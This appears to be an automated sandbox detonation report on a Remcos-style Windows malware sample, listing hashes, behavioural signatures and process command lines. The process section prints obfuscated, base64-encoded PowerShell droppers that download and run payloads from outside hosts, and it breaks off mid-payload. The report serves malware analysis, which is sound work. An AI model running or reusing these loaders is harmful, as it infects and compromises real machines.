| SHA1 | e6b91315ba474c1aaca5d095b578e68af884d896 |
| SHA256 | 34eb4bf247823d0d95ad1434820620b3eda8278178150a16b699507b317ca5b5 |
| SHA512 | 610eb3f71e4545748bdf291d0e6920f4c365379d8f335a395f8550e6b4b2540df57550ddfabb319dba40890f2edc9435fba6bcd10d9c5940699637b72f114b39 |
C:\Users\Admin\AppData\Local\Temp\RESDA1A.tmp
| MD5 | dbec78882449ed469d4c75b704bda307 |
| SHA1 | 41bd8f928c0b148e6e060838834b2ccfa1af5db2 |
| SHA256 | 3b77b742499f1c0712d39c1e32934f9b5bac7663baed7a87ee25e93c6e6b37a4 |
| SHA512 | 5d8f0c3e396ddaed700d1a724a1e966b2398cf5ab85efbd26da90218ad849fa393ac5d520e30bd1333599ee77ba80e50f7a13c187d4ffa34764cd06a4348f0b2 |
C:\Users\Admin\AppData\Local\Temp\ajptgllb.dll
| MD5 | e876a12fc1006a774257e561c88f6fdb |
| SHA1 | 1560b163c2968f471518c0ec90f2e3689dce49fe |
| SHA256 | 3bf03516700efa19844a70fe9b3a1a5d89ef12aa2722b9fe39cb4324c6227893 |
| SHA512 | 441984b83f4aa85b4d10de4725cd725631b5c1745a202ff7f2b8f9d43790017e8efbde80b8eb1194e0628ee94700ec8cc546152e0467c0a8df768611310d088c |
C:\Users\Admin\AppData\Local\Temp\ajptgllb.pdb
| MD5 | 22a2bcb94bbd1637ff3c526f355f95e9 |
| SHA1 | e5d97c9a3ecb5cfc7dd03e7034e9121a86af663f |
| SHA256 | 51e4abaad3857e34d81c30e5ca2b5f173d4289391a90a003ef732e5b0e25f7d2 |
| SHA512 | a827b3416db53d120e1d973009d0e3d52ac12164463f2e6ed30b912f1bf05c45b76350a87c6756b630cf251a2fdc4c4dab0a66831e740e88c0f9e4019cb2b352 |
C:\Users\Admin\AppData\Roaming\instantflowercaseneedbeautygirlsh.vBS
| MD5 | ccde7ef0e90a5a62394fafe77c7eff7e |
| SHA1 | 197cbc0c7ab873fd02bf2b8a3a17d7b0f44bb003 |
| SHA256 | cc67b8be8fc325cf915731f69dd2c36d77c12ea1819726e70ed57170fafd1722 |
| SHA512 | 047baeb2e3d183605346025f86df3042f596bd2505adf7597ffb2fd972acf9db6bd62d03a3f9b52c9a9ffabca743d5e3c359a5a12fc79a3d6e93fdc8d7930dfe |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | cbe57cceefa69f66eb1ed251319d8295 |
| SHA1 | b3bebdae13fb0ead83255556244d99a7816ee355 |
| SHA256 | 0cab71eda1ea27f02d605977a278f2c864ea4db1a4262f4fbe081b0e5774fcba |
| SHA512 | c8efaddad3e680bba4fe97a68460f66a1a9d7e8e0549d87efdb424e08c29954a43f1acf5990d9eb10db90d574e0fade0286256c370cd9549561dd68c5d303e19 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-07 06:55
Reported
2024-08-07 06:57
Platform
win10v2004-20240802-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4472 set thread context of 3168 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\accdfe7a24bcb621a1dade4ab39eddb2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poweRSheLL -EX ByPasS -Nop -w 1 -C DeviCecreDenTialdEpLOYMenT.ExE ; iex($(ieX('[sySTem.TeXT.EncOdINg]'+[ChaR]0X3A+[CHAr]0X3a+'uTF8.gEtsTRing([sYsTem.CONvERt]'+[cHar]58+[chAR]58+'fROmBase64sTRInG('+[chAR]34+'JGkxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUkRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlnd0Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdxQXpoT1NDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkcnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2RyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmV5U25Scyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVWMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1VyZ3VZdmpEQlAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaTE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS45MC44OS41MC8xMDAvaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoZXJlYWx3YXlzLmdJRiIsIiRlTnY6QVBQREFUQVxpbnN0YW50Zmxvd2VyY2FzZW5lZWRiZWF1dHlnaXJsc2gudkJTIiwwLDApO3NUYXJULVNMRWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoLnZCUyI='+[CHAr]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
poweRSheLL -EX ByPasS -Nop -w 1 -C DeviCecreDenTialdEpLOYMenT.ExE ; iex($(ieX('[sySTem.TeXT.EncOdINg]'+[ChaR]0X3A+[CHAr]0X3a+'uTF8.gEtsTRing([sYsTem.CONvERt]'+[cHar]58+[chAR]58+'fROmBase64sTRInG('+[chAR]34+'JGkxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJlUkRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlnd0Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdxQXpoT1NDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkcnIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2RyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmV5U25Scyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVWMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1VyZ3VZdmpEQlAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaTE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS45MC44OS41MC8xMDAvaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoZXJlYWx3YXlzLmdJRiIsIiRlTnY6QVBQREFUQVxpbnN0YW50Zmxvd2VyY2FzZW5lZWRiZWF1dHlnaXJsc2gudkJTIiwwLDApO3NUYXJULVNMRWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaW5zdGFudGZsb3dlcmNhc2VuZWVkYmVhdXR5Z2lybHNoLnZCUyI='+[CHAr]34+'))')))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r50m1r4v\r50m1r4v.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA73C.tmp" "c:\Users\Admin\AppData\Local\Temp\r50m1r4v\CSC837F1182E94D48AEA9102F1B3918AD2F.TMP"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\instantflowercaseneedbeautygirlsh.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBr⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷a⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷c⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷LwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cgB2⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷dwBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bu⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷LgBj⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷cg⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷aQBs⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YgBz⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷agBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷ZQBi⤏ ꒼ ⛲ ⫰ 〷EM⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bgB0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷ZQB3⤏ ꒼ ⛲ ⫰ 〷C0⤏ ꒼ ⛲ ⫰ 〷TwBi⤏ ꒼ ⛲ ⫰ 〷Go⤏ ꒼ ⛲ ⫰ 〷ZQBj⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQ⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷ZQB0⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷VwBl⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷QwBs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgB5⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷ew⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷dwBl⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷QwBs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷ZQBu⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBE⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷dwBu⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷R⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷YQ⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷aw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷fQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷a⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷BX⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷aQB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷LQBI⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷JwBG⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷aQBs⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷FQ⤏ ꒼ ⛲ ⫰ 〷bw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷bwB3⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bm⤏ ꒼ ⛲ ⫰ 〷HI⤏ ꒼ ⛲ ⫰ 〷bwBt⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBr⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷t⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷bwBy⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷ZwBy⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷dQBu⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷QwBv⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBy⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷B9⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷LQBu⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷dQBs⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Hs⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷ZQBU⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷PQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Fs⤏ ꒼ ⛲ ⫰ 〷UwB5⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷LgBU⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷e⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷RQBu⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷bwBk⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷bgBn⤏ ꒼ ⛲ ⫰ 〷F0⤏ ꒼ ⛲ ⫰ 〷Og⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷FU⤏ ꒼ ⛲ ⫰ 〷V⤏ ꒼ ⛲ ⫰ 〷BG⤏ ꒼ ⛲ ⫰ 〷Dg⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bv⤏ ꒼ ⛲ ⫰ 〷Hc⤏ ꒼ ⛲ ⫰ 〷bgBs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BE⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷Ow⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷cwB0⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷cgB0⤏ ꒼ ⛲ ⫰ 〷EY⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bh⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 